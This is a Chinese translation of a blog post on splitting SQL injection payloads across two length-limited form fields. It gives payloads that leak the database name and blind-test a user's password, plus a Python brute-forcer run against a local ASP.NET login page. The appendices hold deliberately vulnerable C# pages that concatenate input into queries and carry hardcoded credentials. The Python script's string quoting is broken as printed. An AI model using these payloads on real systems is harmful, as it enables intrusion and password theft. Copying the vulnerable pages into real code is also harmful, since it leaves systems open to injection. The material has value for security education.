[译]突破sql字符限制

原文地址: http://www.greensql.com/blog/2011/09/shortest-sql-injection-attack/
场景1.
在本场景中,web应用程序接收first-name和last-name,然后输入匹配的Email地址(代码参考附录A)
正常发送到数据库的sql语句如下
select EmailAddress from Person.Contact where FirstName = ‘@fn’ and LastName = ‘@ln’; @fn和@ln是user的输入

攻击者可以使用下面的方法来获得数据库的名字:
‘ union select db_name();–

该字符串有27个字节
如果user的输入限制为每个field 15个字节,上述的攻击将会被封锁。即使这样,攻击者可以使用下面的字符串来绕过限制:
First Name: ‘union select/* (15 bytes)
Last Name: */db_name();– (12 bytes)
结果将是下面的查询语句:
select EmailAddress from person.contact where FirstName = ”union select/*’ and LastName = ‘*/db_name()–’;

将会导致输出数据库的名字

场景2
在本例中,攻击者攻击web接收一个username 和password,并且输出“Access Granted!”或“Access Denied!”。web程序限制每个输入域为20个字节。但是web程序之检查user输入从长度(附录B)
应用程序发送如下查询:
select count(*) from dbo.users where UserName = ‘@un’ and Password = ‘@pass’; @un和@pass是用户输入

为了暴力破解david的密码的第一个字节,攻击者发送如下字符串:
•    User Name: david’and substring/*
•    Password: */(password,1,1)=’p
攻击将导致如下查询:
select count(*) from dbo.users where UserName = ‘david’and substring/*’ and Password = ‘*/(password,1,1)=’p';

如果password的第一个字符是'p',那么返回1,否则返回0.为了保留破解david的密码,攻击者可以使用如下python脚本
##################################################
##   GreenSQL 2-fields SQL Injection Attack     ##
##            Password Brute Forcer             ##
##              Proof-of-Concept                ##
##  This code is for educational purposes only  ##
##################################################

import urllib

un = 'david'and substring/*'
i=0
CurrChr = 0
password = ""

for index in range(1,40):
    if CurrChr == 125:
        break
    for CurrChr in range(32,126):
        pswd = '*/(password,' + str(index) + ',1)='' + chr(CurrChr)
        args = {'UserName':un,'Password':pswd}
        encoded_args = urllib.urlencode(args)
        url = 'http://127.0.0.1:54213/WebSite1/Authentication.aspx'
        print "Sending: ", index, "X", chr(CurrChr)
        f = urllib.urlopen(url, encoded_args)
        contents = f.read()
        f.close()
        if (contents.find('Access Granted') != -1):
            password = password + chr(CurrChr)
            print "Password: ", password
            CurrChr =1
            break


附录 A - Web Application #1 Source Code
===========================================
<%@ Page Language="C#" Debug="true" %>
  <%@ Import Namespace="System.Data" %>
  <%@ Import Namespace="System.Data.SqlClient" %>
  <html>
 <head><title>Shortest</title></head>

  <body>
  <form id = "f" method="post" action="shortest.aspx">
    First Name: <input name = "FirstName" type="text" maxlength="15" />(maxlength: 15) <br />
    Last Name: <input name = "LastName" type="text" maxlength="15"/>(maxlength: 15) <br />
    <input id="submit" type="submit" value="Get Email" />
  </form>

  <%
      string conn = "server=david-PC; uid=GreenSQL; pwd=GreenSQL; database=AdventureWorks; Connect Timeout=10000";
      DataSet ds = new DataSet();
      string fn = "";
      fn = Request.Form["FirstName"];
      string ln = "";
      ln = Request.Form["LastName"];
      if (fn.Length <= 15 && ln.Length <= 15)
      {
          string command = "select EmailAddress from person.contact where FirstName = '" + fn + "' and LastName = '" + ln + "';";
          SqlDataAdapter data = new SqlDataAdapter(command, conn);
          data.Fill(ds);

          Response.Write("<table>");
          foreach (DataRow row in ds.Tables[0].Rows)
          {
              Response.Write("<tr>");
              foreach (DataColumn col in ds.Tables[0].Columns)
              {
                  Response.Write("<th>");
                  Response.Write(row[col]);
                  Response.Write("</th>");
              }
              Response.Write("</tr>");
          }
          Response.Write("</table>");
          Response.Write(command);
          if (fn != null && ln != null)
              Response.Write("<br />FirstName: " + fn + "(" + fn.Length.ToString() + ")<br />LastName: " + ln + "(" + ln.Length.ToString() + ")<br />Total Length: " + (fn.Length + ln.Length).ToString());
      }
      else
      {
          Response.Write("Username and Passwords are limited to 15 characters maximum!");
      }
  %>
</body>
</html>


附录B– Web Application #2 Source Code
===========================================

<%@ Page Language="C#" Debug="true" %>
  <%@ Import Namespace="System.Data" %>
  <%@ Import Namespace="System.Data.SqlClient" %>
  <html>
 <head><title>Shortest</title></head>

  <body>
  <form id = "f" method="post" action="Authentication.aspx">
    Username: <input name = "UserName" type="text" maxlength="20" />(maxlength: 20) <br />
    Password: <input name = "Password" type="text" maxlength="20"/>(maxlength: 20) <br />
    <input id="submit" type="submit" value="Authenticate" />
  </form>

  <%
      string conn = "server=david-PC; uid=GreenSQL; pwd=GreenSQL; database=AdventureWorks; Connect Timeout=10000";
      DataSet ds = new DataSet();
      string un = "";
      un = Request.Form["Username"];
      string pass = "";
      pass = Request.Form["Password"];
      if (un.Length <= 20 && pass.Length <= 20)
      {
          string command = "select count(*) from dbo.users where UserName = '" + un + "' and Password = '" + pass + "';";
          SqlDataAdapter data = new SqlDataAdapter(command, conn);
          data.Fill(ds);

          Response.Write("<table>");
          foreach (DataRow row in ds.Tables[0].Rows)
          {
              Response.Write("<tr>");
              foreach (DataColumn col in ds.Tables[0].Columns)
              {
                  if (System.Convert.ToInt32(row[0]) > 0)

                      Response.Write("Access Granted!");

                  else
                      Response.Write("Access Denied!");
              }
              Response.Write("</tr>");
          }
          Response.Write("</table>");
          Response.Write(command);
          if (un != null && pass != null)
              Response.Write("<br />UserName: " + un + "(" + un.Length.ToString() + ")<br />Password: " + pass + "(" + pass.Length.ToString() + ")<br />Total Length: " + (un.Length + pass.Length).ToString());
      }
      else
      {
          Response.Write("Username and Passwords are limited to 15 characters maximum!");
      }
  %>
</body>
</html>

你可能感兴趣的:(sql)